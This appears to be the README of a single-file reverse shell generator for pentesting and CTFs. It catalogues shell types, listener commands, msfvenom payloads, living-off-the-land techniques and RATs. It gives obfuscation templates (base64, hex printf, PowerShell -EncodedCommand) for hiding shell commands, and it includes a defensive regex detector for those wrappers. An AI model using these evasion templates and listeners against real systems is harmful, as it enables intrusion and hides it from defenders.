Self-contained reverse shell generator · zero dependencies · single HTML file
For authorised penetration testing and CTF use only
RaccShells is a self-contained, single-file reverse shell reference tool. Open index.html: no server, no install, no internet required. Enter your IP and port, copy the shell, and go.
Built with a dark terminal aesthetic: scanline overlay, matrix green, monospace everything.
| Tab | Contents |
|---|---|
| Reverse Shells | 72 shells across Bash, Python, Perl, PHP, Ruby, PowerShell, Java, Go, Lua, Awk, … |
| Bind Shells | 14 bind-side listeners |
| MSFVenom | 25 ready-to-paste msfvenom payloads |
| Shell Upgrade | TTY spawn, stty raw, socat fully interactive, escape binaries |
| Tools & Listeners | pwncat-cs, pwncat (cytopia), Chashell, HellShell, SSL-AES, FuegoShell, CHAOS RAT, tmate |
| Living off the Land | Windows (LOLBAS) + Linux + macOS: download, exec, persistence, tunnel |

Every shell shows an animated SVG diagram when expanded. The diagrams are generated inline; there are no static images.
```mermaid
flowchart LR
    subgraph VICTIM
        V["💻 :random"]
    end
    subgraph ATTACKER
        A["🖥 :4444 LISTEN"]
    end
    V -- "① TCP connect-back" --> A
    A -. "② commands" .-> V
    V -. "③ output" .-> A
```

```mermaid
flowchart LR
    subgraph ATTACKER
        A["🖥 connects"]
    end
    subgraph VICTIM
        V["💻 :4444 LISTEN"]
    end
    A -- "① connect to port" --> V
    A -. "② commands" .-> V
    V -. "③ output" .-> A
```

```mermaid
flowchart LR
    subgraph VICTIM
        V["💻 DNS client"]
    end
    subgraph DNS["DNS Nameserver\nyour domain NS"]
        D[" "]
    end
    subgraph ATTACKER
        A["🖥 NS record"]
    end
    V -- "① DNS query\n(XSalsa20 enc)" --> D
    D -- "NS forward" --> A
    A -. "② encoded response" .-> D
    D -. "NS reply" .-> V
```

```mermaid
flowchart LR
    subgraph VICTIM
        V["💻 polling"]
    end
    subgraph ATTACKER
        A["🖥 HTTP :80"]
    end
    V -- "① GET /token\npoll for cmd" --> A
    A -. "② 200 encoded cmd" .-> V
    V -- "③ POST /token\nencoded output" --> A
```

```mermaid
flowchart LR
    subgraph VICTIM
        V["💻 :random"]
    end
    subgraph ATTACKER
        A["🖥 :443 LISTEN"]
    end
    V -- "① TLS handshake" --> A
    A -- "② 🔒 encrypted cmd" --> V
    V -- "③ 🔒 encrypted output" --> A
    style A fill:#1a1200,stroke:#cc9900
    style V fill:#1a0000,stroke:#ff4444
```
Each shell that contains an interpreter supports dynamic obfuscation: click ▶ obf to cycle modes without leaving the page.

```mermaid
stateDiagram-v2
    [*] --> plain
    plain --> base64 : click obf
    base64 --> var_split : click obf
    var_split --> hex_printf : click obf
    hex_printf --> plain : click obf
    state "bash base64" as base64
    note right of base64
        bash -c "$(echo '...'|base64 -d)"
    end note
    state "$var split" as var_split
    note right of var_split
        b='ba';s='sh'; eval $b$s${IFS}-i...
    end note
    state "hex printf" as hex_printf
    note right of hex_printf
        eval "$(printf '\x62\x61\x73\x68...')"
    end note
```
Obfuscation modes per interpreter:
| Interpreter | Modes |
|---|---|
| Bash / Zsh / Sh | base64 · $var split · hex printf |
| PowerShell | -EncodedCommand (UTF-16LE) · [char[]] IEX |
| Python | exec(base64.b64decode(...)) |
| Perl | eval(pack('H*', hex)) |
| PHP | eval(base64_decode(...)) |
| Ruby | eval(Base64.decode64(...)) |
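
For defenders, the wrapper shapes in the table above are distinctive enough to match in process command-line logs. The following is an added example, not part of RaccShells: it flags those shapes and decodes the wrapped payload for triage. The regexes, the `triage` helper and the sample lines are assumptions constructed here, and the PowerShell `[char[]] IEX` mode is left out because the page does not show its shape.

```python
import base64
import re

B64, Q = r"([A-Za-z0-9+/]{8,}={0,2})", r"""['"]"""
# (mode, regex with the encoded blob in group 1, blob encoding)
WRAPPERS = [
    ("bash base64", rf"echo\s+{Q}?{B64}{Q}?\s*\|\s*base64\s+(?:-d|--decode)", "b64"),
    ("bash hex printf", rf"printf\s+{Q}((?:\\x[0-9a-fA-F]{{2}}){{4,}}){Q}", "hexesc"),
    ("bash $var split", r"(eval\s+(?:\$\w+){2,})", "raw"),
    ("powershell -EncodedCommand", rf"(?:powershell|pwsh)\b.*?\s-(?:e|ec|en|enc\w*)\s+{B64}", "b64-utf16"),
    ("python exec b64decode", rf"exec\(\s*base64\.b64decode\(\s*b?{Q}{B64}", "b64"),
    ("perl eval pack", rf"eval\(\s*pack\(\s*{Q}H\*{Q}\s*,\s*{Q}([0-9a-fA-F]{{8,}}){Q}", "hex"),
    ("php eval base64_decode", rf"eval\(\s*base64_decode\(\s*{Q}{B64}", "b64"),
    ("ruby eval decode64", rf"eval\(\s*Base64\.decode64\(\s*{Q}{B64}", "b64"),
]

def _decode(kind, blob):
    """Return the decoded text, or None if the blob is not valid for that encoding."""
    try:
        if kind == "raw":  # nothing encoded: report the matched fragment itself
            return blob
        if kind in ("hex", "hexesc"):
            return bytes.fromhex(blob.replace("\\x", "")).decode("utf-8", "replace")
        raw = base64.b64decode(blob, validate=True)
        return raw.decode("utf-16-le" if kind == "b64-utf16" else "utf-8", "replace")
    except ValueError:  # bad padding, odd hex length, stray characters
        return None

def triage(cmdline):
    """Return [(mode, decoded_payload)] for each wrapper shape found in a command line."""
    found = ((mode, _decode(kind, m.group(1)))
             for mode, pattern, kind in WRAPPERS
             for m in re.finditer(pattern, cmdline, re.I))
    return [(mode, text) for mode, text in found if text is not None]

# Constructed samples: each wraps a benign stand-in payload; the last is an unrelated command.
PAYLOAD = "echo triage-test"
_b64, _hex = base64.b64encode(PAYLOAD.encode()).decode(), PAYLOAD.encode().hex()
SAMPLES = [
    f"bash -c \"$(echo '{_b64}'|base64 -d)\"",
    "eval \"$(printf '" + "".join(f"\\x{c:02x}" for c in PAYLOAD.encode()) + "')\"",
    "powershell -NoP -EncodedCommand " + base64.b64encode(PAYLOAD.encode("utf-16-le")).decode(),
    f"perl -e \"eval(pack('H*','{_hex}'))\"",
    "tar -czf backup.tgz /etc",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line) or "no wrapper", "<-", line[:60])
```

A hit is a triage lead rather than a verdict: legitimate installers and management tooling also pass encoded commands, so review the decoded payload alongside the parent process and user.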
Shells with encrypted transport are highlighted in gold and carry a 🔒 badge.

```mermaid
flowchart TD
    subgraph Encrypted["🔒 Encrypted Transport"]
        direction LR
        E1["OpenSSL s_client"]
        E2["PowerShell TLS #4"]
        E3["Ncat --ssl"]
        E4["HoaxShell HTTPS"]
        E5["SSL-AES C++ Shell"]
        E6["Chashell DNS (XSalsa20)"]
    end
```

Use the 🔒 encrypted filter chip to show only these shells.
Techniques organised by OS, each with its own filter view.

```mermaid
mindmap
  root((LotL))
    Windows
      Download & Execute
        certutil
        bitsadmin
        curl Win10+
        PowerShell cradle
      Code Execution
        mshta HTA
        regsvr32 Squiblydoo
        rundll32 JS
        MSBuild C#
        InstallUtil
        wmic
      Persistence
        Registry Run key
        Scheduled Task
        Startup folder
    Linux
      Download & Execute
        curl pipe bash
        wget pipe bash
        python3 fetch
      File Transfer
        nc / socat
        dd raw
        base64 paste
      Tunneling
        SSH reverse tunnel
        SSH SOCKS5
        Chisel
      Persistence
        crontab
        systemd user service
        LD_PRELOAD
    macOS
      Download & Execute
        curl pipe bash
        osascript
      Persistence
        LaunchAgent plist
        crontab
```
| Tool | Type | Platform |
|---|---|---|
| pwncat-cs | Post-exploitation platform | Linux |
| pwncat (cytopia) | Netcat on steroids | Linux / Mac / Win |
| Chashell | DNS reverse shell | All |
| HellShell | Shellcode obfuscator | Windows |
| SSL-AES Reverse Shell | TLS C++ shell | Windows |
| FuegoShell | SMB named-pipe shell | Windows |
| CHAOS RAT | Go RAT with web UI | Linux / Win |
| tmate | Terminal sharing via SSH | Linux / Mac |
```bash
# Option 1: open directly in browser (no server needed)
open index.html      # macOS
start index.html     # Windows
xdg-open index.html  # Linux

# Option 2: serve locally
python3 -m http.server 8080
# → http://localhost:8080
```

- Set LHOST / IP, PORT, and preferred shell binary
- Pick a listener from the dropdown; the attacker-side command auto-updates
- Use the filter chips to narrow by OS, encryption, or obfuscation support
- Click a shell to expand: the diagram animates and the copy button is ready
- Optionally click ▶ obf to cycle through obfuscation modes before copying
```mermaid
flowchart LR
    L["Listener Dropdown"] --> NC["nc -lvnp PORT"]
    L --> NCAT["ncat -lvnp PORT"]
    L --> SOCAT["socat file:tty,raw TCP-LISTEN:PORT"]
    L --> RLWRAP["rlwrap nc -lvnp PORT (TTY)"]
    L --> MSF["msf multi/handler"]
    L --> PCS["pwncat-cs -lp PORT"]
    L --> PCY["pwncat -l -p PORT"]
```
